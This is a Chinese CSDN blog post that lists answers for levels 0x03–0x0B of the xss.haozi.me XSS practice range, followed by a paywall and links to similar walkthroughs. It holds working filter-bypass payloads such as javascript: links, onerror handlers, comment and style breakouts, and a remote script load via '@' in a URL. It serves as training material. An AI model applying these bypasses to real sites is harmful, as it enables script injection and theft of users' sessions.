xss.haozi挑战

CC_FL

已于 2022-03-11 08:31:26 修改

阅读量3.7k

点赞数

文章标签： webview javascript

于 2022-03-10 21:01:56 首次发布

本文链接：https://blog.csdn.net/CC_FL/article/details/123410840

版权

本文介绍了多种XSS跨站脚本攻击的实现方式，包括模板字符串、URL编码、换行利用、事件触发等，详细解析了如何通过javascript:协议、特殊字符编码、注释等方式插入恶意脚本，提升网络安全意识。

摘要由CSDN通过智能技术生成

0x03(模板字符串)
<a href=javascript:alert `1`>1</a>

0x04(url)
<a href="javascript:alert(1)">1</a>

0x05（--!>）
--!><script>alert(1)</script>

0x06(换行)
onclick
=alert(1)

0x07(on事件)
<img src=x οnerrοr=alert(1)>

0x08(//用法)
</style//><script>alert(1)</script>

0x09(on事件)
https://www.segmentfault.com" οnerrοr=alert(1)

0x0A(@的用法相当于访问https://xss.haozi.me/j.js)
https://www.segmentfault.com@xss.haozi.me/j.js

0x0B(url)
<a href=javascript:&#97

最低0.47元/天解锁文章

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

CC_FL

关注关注

0
点赞
踩
0

收藏

觉得还不错? 一键收藏
0
评论
复制链接

分享到 QQ

分享到新浪微博

扫一扫

xss.haozi靶场通关

qq_31088019的博客

07-29

389

xss.haozi靶场通关

xss靶场练习之xss.haozi.me解析及答案

lyz_yyds107的博客

08-05

1090

靶场绕过

参与评论您还未登录，请先登录后发表或查看评论

XSS-haozi

个人博客

08-10

403

https://xss.haozi.me/ XSS学习 github项目地址：haozi/xss-demo: ????????‍♂️ xss 攻防靶场，issues 有答案 (github.com) 0x00 server code function render (input) { return '<div>' + input + '</div>' } payload <script>alert(1)</script> 未做处理 0x01 ser

xss.haozi.me练习通关

lml_0916的博客

07-27

608

这里将auto或者on过滤成了_，并且是在input标签输出，所以这里可以将type的值改成imge的形式进行输出，并且使用换行的方式来停止以on开头=结尾变成_。这一关是将括号给过滤掉了，也就是说alert()的括号不可以直接打印出来，所以这里可以采用两种方式，一种是编码的形式，另一种就是使用反引号来代替括号。这一关限制了不可以对style标签进行闭合，一旦出现会转变为“坏人”，但是html中将标签换行也是可以识别的，所以可以换行处理标签。将src闭合，然后写弹窗，然后将后面注释。............

xss.haozi.me通关记录

weixin_50597969的博客

04-13

1450

xss-haizi-me通关记录0x000x010x020x030x040x050x060x070x080x090x0A0x0B0x0C0x0D0x0E0x0F0x100x110x12 传送门 0x00 server code: function render (input) { return '<div>' + input + '</div>' } input code: <script>alert(1)</script> html: <div

haozi/xss-demo通关

ma963852的博客

04-13

271

目录 0x00 0x01 0x02 0x03 0x04 0x05 0x06 0x07 0x08 0x09 0x0a 0x0b 0x0c 0x0d 0x0e 0x0f 0x10 0x11 0x12 0x00 <script> alert(1)</script> 0x01 </textarea><script>alert(1)</script> 0x02 "><s...

xss靶场之xss.haozi

最新发布

weixin_46954909的博客

06-01

693

这题显而易见的是括号不能使用了，我们的办法是替代法和进行编码，使用`来替代（）或者使用编码的方式来替代掉括号，但要注意的是，script不能解析编码，所以script标签不能用编码的方式。这题没什么好说的，就是闭合+注释，搭配上script语句就可以了，虽然将&，’”<>/\都编码了，但是这就是典型的骗自己，因为即时编码了，但在img标签里也是能解析的，所以相当于徒劳。这题我们观察到直接输入，他是在input语句的属性值中，无法执行我们的js语句，所以我们的思路也是直接闭合掉语句，执行js语句。

xss.haozi.me弹窗练习0x00-0x10

weixin_52159400的博客

07-28

658

alert(1)

xss.js.zip

07-29

"xss.js.zip"是一个专注于防止XSS攻击的JavaScript模块，它通过严格的输入过滤和白名单策略来确保用户提交的内容不会引入潜在的恶意代码。首先，"xss.js"的核心功能在于提供了一套完整的输入过滤机制。这个模块会...

Xss.haozi在线练习靶场1-19关（带答案及靶场地址）

2301_78238055的博客

08-22

753

一个在线的XSS练习靶场19关全带通关答案

XSS haozi靶场通关笔记

I_WORM的博客

01-31

2331

xss专练靶场；xss.haozi.me靶场通关笔记

XSS漏洞：xss.haozi.me靶场通关

qq_68163788的博客

01-18

2237

xss.haozi.me是一个专门用于测试和学习跨站脚本（XSS）漏洞的靶场。XSS漏洞是一种常见的Web安全漏洞，攻击者通过在网页中注入恶意脚本，可以获取用户的敏感信息，如Cookie、会话令牌等。通关xss.haozi.me靶场意味着成功利用了该靶场中的XSS漏洞，并完成了相应的任务。在这个过程中，你需要利用各种XSS漏洞，包括反射型XSS、存储型XSS等，来实现跨站脚本攻击，并获取相应的flag或者完成指定的任务。通过通关xss.haozi.me靶场，你可以提升自己的Web安全技能，了解XSS

xss靶场、xss.haozi.me靶场详细通关教程

LawnCat的博客

03-27

2559

该靶场来自xss.haozi.me，其中一些解题方法也是根据官方的题解。该文章主要用于记录自己的学习历程。xss.haozi.me是一个学习xss漏洞非常不错的靶场，里面集合了各种绕过方式，对于小白来说非常具有学习意义。

XSS靶场（二）xss.haozi

C_LCH_2000的博客

07-29

338

xss.haozi所有关卡解法

xss.haozi练习通关详解

爱国小白帽

11-05

2572

题目连接：https://xss.haozi.me 0x00 原理解读：这个游戏是要弹图片才算通关的，光弹窗不行，所以第一关就用最简单的img标签过 payload： <img src="任意图片名" onerror="alert(1)"> 0x01 原理解读：从server code中可以看到输入的内容被插入到了<textarea>标签中，所以只要闭合这个标签就行了 payload： </textarea><img src="任意图片名" onerror=

xss.haozi.me靶场“0x00-0x0A”通关教程

钟言的博客

03-12

5613

本篇介绍了xss.haozi.me靶场0x00到0x0A通关教程，详细内容包含了：一、靶场介绍二、第一关 0x00 不做限制三、第二关 0x01 文本闭合标签绕过四、第三关 0x02 双引号闭合绕过五、第四关 0x03 过滤括号六、第五关 0x04 编码绕过七、第六关 0x05 注释闭合绕过八、第七关 0x06 换行绕过九、第八关 0x07 删除标签十、第九关 0x08 多加空格绕过十一、第十关 0x09 闭合绕过十二、第十一关 0x0A JS调用等内容

XSS.haozi.me靶场通关记录

qq_52321903的博客

04-04

245

XSS.haozi.me靶场是一个部署在Github的在线靶场，并且是一个白盒，就是说我们能够直接看到页面源代码，所以直接根据源码来判断该使用什么方法绕过。XSS绕过方法：闭合标签绕过绕过小括号、双引号、单引号利用反引号``编码绕过(利用实体编码、unicode编码绕过混淆绕过（利用html语法不严格、容错性）换行缺失>闭合的标签空格、TAB关键字绕过大小写绕过编码绕过字符拼接空格绕过利用/代替空格编码绕过(利用实体编码、unicode编码绕过)利用eval等方法绕过。

xss.haozi.me通关教程

梦里明明有六趣，觉后空空无大千

02-01

1386

文笔生疏，措辞浅薄，望各位大佬不吝赐教，万分感谢。

APMServ搭建教程：利用xss.me构造跨站攻击

本教程是关于如何利用xss.me自动攻击工具进行跨站脚本(Cross-Site Scripting, XSS)攻击的搭建指南。它主要针对的是APMServ 5.2.6作为服务器环境，同时提到了一些关键步骤和注意事项。首先，确保APMServ的安装路径...